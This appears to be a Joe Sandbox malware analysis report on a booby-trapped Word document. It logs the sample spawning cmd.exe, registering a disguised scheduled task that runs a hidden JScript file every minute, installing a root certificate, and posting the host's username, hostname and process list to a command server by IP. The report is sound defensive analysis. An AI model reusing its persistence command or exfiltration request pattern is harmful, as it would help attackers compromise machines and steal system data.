Loading ...

Analysis Report

Overview

General Information

Joe Sandbox Version:20.0.0
Analysis ID:424458
Start time:13:59:50
Joe Sandbox Product:Cloud
Start date:09.11.2017
Overall analysis duration:0h 4m 55s
Hypervisor based Inspection enabled:false
Report type:full
Sample file name:adjusted_records.doc
Cookbook file name:defaultwindowsofficecookbook.jbs
Analysis system description:Windows 7 (Office 2010 SP2, Java 1.8.0_40, Flash 16.0.0.305, Acrobat Reader 11.0.08, Internet Explorer 11, Chrome 55, Firefox 43)
Number of analysed new started processes analysed:24
Number of new started drivers analysed:0
Number of existing processes analysed:0
Number of existing drivers analysed:0
Number of injected processes analysed:0
Technologies
  • HCA enabled
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
Detection:MAL
Classification:mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1
HCA Information:
  • Successful, ratio: 100%
  • Number of executed functions: 0
  • Number of non-executed functions: 0
EGA Information:Failed
Cookbook Comments:
  • Found application associated with file extension: .doc
  • Found Word or Excel or PowerPoint document
  • Simulate clicks
  • Found warning dialog
  • Click Ok
  • Number of clicks 1257
  • Close Viewer
Warnings:
Show All
  • Exclude process from analysis (whitelisted): OSPPSVC.EXE, WmiApSrv.exe, conhost.exe, WMIADAP.exe, dllhost.exe
  • Report size getting too big, too many NtOpenKeyEx calls found.
  • Report size getting too big, too many NtQueryAttributesFile calls found.
  • Report size getting too big, too many NtQueryValueKey calls found.
  • Report size getting too big, too many NtSetInformationFile calls found.
  • Skipping Hybrid Code Analysis (implementation is based on Java, .Net, VB or Delphi, or parses a document) for: WINWORD.EXE


Detection

StrategyScoreRangeReportingDetection
Threshold1000 - 100Report FP / FNmalicious


Confidence

StrategyScoreRangeFurther Analysis Required?Confidence
Threshold50 - 5false
ConfidenceConfidence


Classification

Analysis Advice

Sample has a GUI, but Joe Sandbox has not found any clickable buttons, likely more UI automation may extend behavior



Signature Overview

Click to jump to signature section


Software Vulnerabilities:

barindex
Potential document exploit detected (performs HTTP gets)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 85.93.2.148:443
Potential document exploit detected (unknown TCP traffic)Show sources
Source: global trafficTCP traffic: 192.168.1.16:49163 -> 85.93.2.148:443
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\cmd.exe

Networking:

barindex
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8414Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8378Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=get_process_list HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 668Host: 85.93.2.148
Found strings which match to known social media urlsShow sources
Source: wscript.exeString found in binary or memory: login.yahoo.com equals www.yahoo.com (Yahoo)
Source: wscript.exeString found in binary or memory: login.yahoo.com0 equals www.yahoo.com (Yahoo)
Source: wscript.exeString found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Urls found in memory or binary dataShow sources
Source: WINWORD.EXEString found in binary or memory: file:///
Source: WINWORD.EXEString found in binary or memory: file:///%f
Source: WINWORD.EXEString found in binary or memory: file:///C:
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc
Source: WINWORD.EXEString found in binary or memory: file:///C:/Users/user/Desktop/adjusted_records.doc))
Source: wscript.exeString found in binary or memory: http://crl.comodo.net/UTN-USERFirst-Hardware.crl0q
Source: wscript.exeString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
Source: wscript.exeString found in binary or memory: http://crl.entrust.net/2048ca.crl0
Source: wscript.exeString found in binary or memory: http://crl.entrust.net/server1.crl0
Source: wscript.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
Source: wscript.exeString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
Source: wscript.exeString found in binary or memory: http://crl.use
Source: wscript.exeString found in binary or memory: http://crl.usertrust.com/UTN-USERFirst-Object.crl0)
Source: wscript.exeString found in binary or memory: http://crt.comodoca.com/UTNAddTrustServerCA.crt0$
Source: wscript.exeString found in binary or memory: http://cybertrust.omniroot.com/repository.cfm0
Source: WINWORD.EXEString found in binary or memory: http://ns.ad
Source: WINWORD.EXEString found in binary or memory: http://ns.adbe.
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0%
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0-
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com0/
Source: wscript.exeString found in binary or memory: http://ocsp.comodoca.com05
Source: wscript.exeString found in binary or memory: http://ocsp.entrust.net03
Source: wscript.exeString found in binary or memory: http://ocsp.entrust.net0D
Source: WINWORD.EXEString found in binary or memory: http://p
Source: wscript.exeString found in binary or memory: http://www.digicert.com.my/cps.htm02
Source: wscript.exeString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: WINWORD.EXEString found in binary or memory: http://www.msnusers.com
Source: wscript.exeString found in binary or memory: http://www.public-trust.com/CPS/OmniRoot.html0
Source: wscript.exeString found in binary or memory: http://www.public-trust.com/cgi-bin/CRL/2018/cdp.crl0
Source: wscript.exeString found in binary or memory: http://www.usertrust.com1
Source: wscript.exeString found in binary or memory: https://
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=get_information
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=get_informationBK
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=get_informationY
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=get_informationx
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=get_process_list
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=get_process_listX
Source: wscript.exeString found in binary or memory: https://85.93.2.148/?page=waitl
Source: wscript.exeString found in binary or memory: https://97
Source: wscript.exeString found in binary or memory: https://secure.comodo.com/CPS0
Uses HTTPSShow sources
Source: unknownNetwork traffic detected: HTTP traffic on port 49164 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49163 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49169
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49171
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49170
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49163
Source: unknownNetwork traffic detected: HTTP traffic on port 49169 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49171 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49170 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49164
Uses a known web browser user agent for HTTP communicationShow sources
Source: global trafficHTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8414Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=get_information HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 8378Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=wait HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 68Host: 85.93.2.148
Source: global trafficHTTP traffic detected: POST /?page=get_process_list HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencoded; Charset=UTF-8Accept: */*Accept-Language: en-USUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Content-Length: 668Host: 85.93.2.148

Boot Survival:

barindex
Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
Source: unknownProcess created: C:\Windows\System32\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /f /tn 'Adobe Acrobat Player Task' /tr 'wscript.exe //b /e:jscript C:\Users\user\AppData\Roaming\Microsoft\Windows\{724b7278-e77d-6a6f-5540-59c97f4e75d3}\crashpad.log' /sc minute /mo 1

Stealing of Sensitive Information:

barindex
Leaks process informationShow sources
Source: global trafficTCP traffic: 192.168.1.16:49171 -> 85.93.2.148:443
Uploads sensitive system information to the internet (privacy leak)Show sources
Source: 192.168.1.16:49163 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49164 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49168 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf
Source: 192.168.1.16:49168 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn
Source: 192.168.1.16:49168 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo
Source: 192.168.1.16:49169 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInf
Source: 192.168.1.16:49169 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information computer (computername): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADIn
Source: 192.168.1.16:49169 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information user (username): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 42 49 44 3a 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 7c 55 73 65 72 4e 61 6d 65 3a 6c 75 6b 65 74 61 79 6c 6f 72 7c 48 6f 73 74 4e 61 6d 65 3a 41 44 4d 49 4e 2d 50 43 7c 44 6f 6d 61 69 6e 4e 65 74 77 6f 72 6b 3a 79 65 73 7c 44 6f 6d 61 69 6e 3a 57 4f 52 4b 47 52 4f 55 50 7c 41 44 49 6e 66 6f 3a 28 4e 6f 29 7c 4d 6f 64 65 6c 3a 6d 74 75 64 7a 62 64 61 70 64 7c 4d 61 63 68 69 6e 65 20 74 79 70 65 3a 31 7c 4f 53 20 56 65 72 73 69 6f 6e 3a 4d 69 63 72 6f 73 6f 66 74 20 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 73 69 6f 6e Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=BID:355171DAB808CF8DE4D6|UserName:user|HostName:computer|DomainNetwork:yes|Domain:WORKGROUP|ADInfo
Source: 192.168.1.16:49170 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&
Source: 192.168.1.16:49171 -> 85.93.2.148:443HTTP traffic detected: Header contains sensitive information b808cf8de4d6 (macaddr): Data Raw: 65 72 73 69 6f 6e 3d 31 2e 30 2e 38 26 62 69 64 3d 33 35 35 31 37 31 44 41 42 38 30 38 43 46 38 44 45 34 44 36 26 67 72 6f 75 70 3d 73 61 6e 74 69 26 6b 65 79 3d 65 65 39 35 39 31 64 64 38 38 39 33 26 69 6e 66 6f 3d 53 79 73 74 65 6d 20 49 64 6c 65 20 50 72 6f 63 65 73 73 2a 30 7c 53 79 73 74 65 6d 2a 34 7c 73 6d 73 73 2e 65 78 65 2a 32 30 30 7c 63 73 72 73 73 2e 65 78 65 2a 32 37 36 7c 77 69 6e 69 6e 69 74 2e 65 78 65 2a 33 31 32 7c 63 73 72 73 73 2e 65 78 65 2a 33 32 30 7c 77 69 6e 6c 6f 67 6f 6e 2e 65 78 65 2a 33 34 38 7c 73 65 72 76 69 63 65 73 2e 65 78 65 2a 34 30 34 7c 6c 73 61 73 73 2e 65 78 65 2a 34 32 30 7c 6c 73 6d 2e 65 78 65 2a 34 32 38 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 35 33 36 7c 73 76 63 68 6f 73 74 2e 65 78 65 2a 36 30 30 7c 73 76 63 Data Ascii: ersion=1.0.8&bid=355171DAB808CF8DE4D6&group=santi&key=ee9591dd8893&info=System Idle Process*0|System*4|smss.exe*200|csrss.exe*276|wininit.exe*312|csrss.exe*320|winlogon.exe*34

Persistence and Installation Behavior:

barindex
Installs new ROOT certificatesShow sources
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob
Source: C:\Windows\System32\wscript.exeRegistry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\3F728A35DE52B2C8994A4FB101A03B95E87B06C8 Blob

Spreading:

barindex
Creates COM task schedule object (often to register a task for autostart)Show sources
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Progid
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\ProgID
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\Software\Classes\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_USERS\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Source: C:\Windows\System32\schtasks.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs
Performs a network lookup / discovery via ARPShow sources
Source: unknownProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: unknownProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\ARP.EXE arp -a
Performs a network lookup / discovery via net viewShow sources
Source: unknownProcess created: C:\Windows\System32\net.exe net view
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\net.exe net view

System Summary:

barindex
Executable creates window controls seldom found in malwareShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEWindow found: window name: SysTabControl32
Found graphical window changes (likely an installer)Show sources
Source: Window RecorderWindow detected: More than 3 window changes detected
Checks if Microsoft Office is installedShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_USERS\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Uses new MSVCR DllsShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_50916076bcb9a742\MSVCR90.dll
Binary contains paths to development resourcesShow sources
Source: WINWORD.EXEBinary or memory string: Unrecognized project languageSThe .VBP file for this project contains an invalid or corrupt library references ID=Error accessing file. Network connection may have been lost.-Fixed or static data can't be larger than 64K
Classification labelShow sources
Source: classification engineClassification label: mal100.evad.spre.expl.spyw.troj.winDOC@26/14@0/1
Creates files inside the user directoryShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\Desktop\~$justed_records.doc
Creates temporary filesShow sources
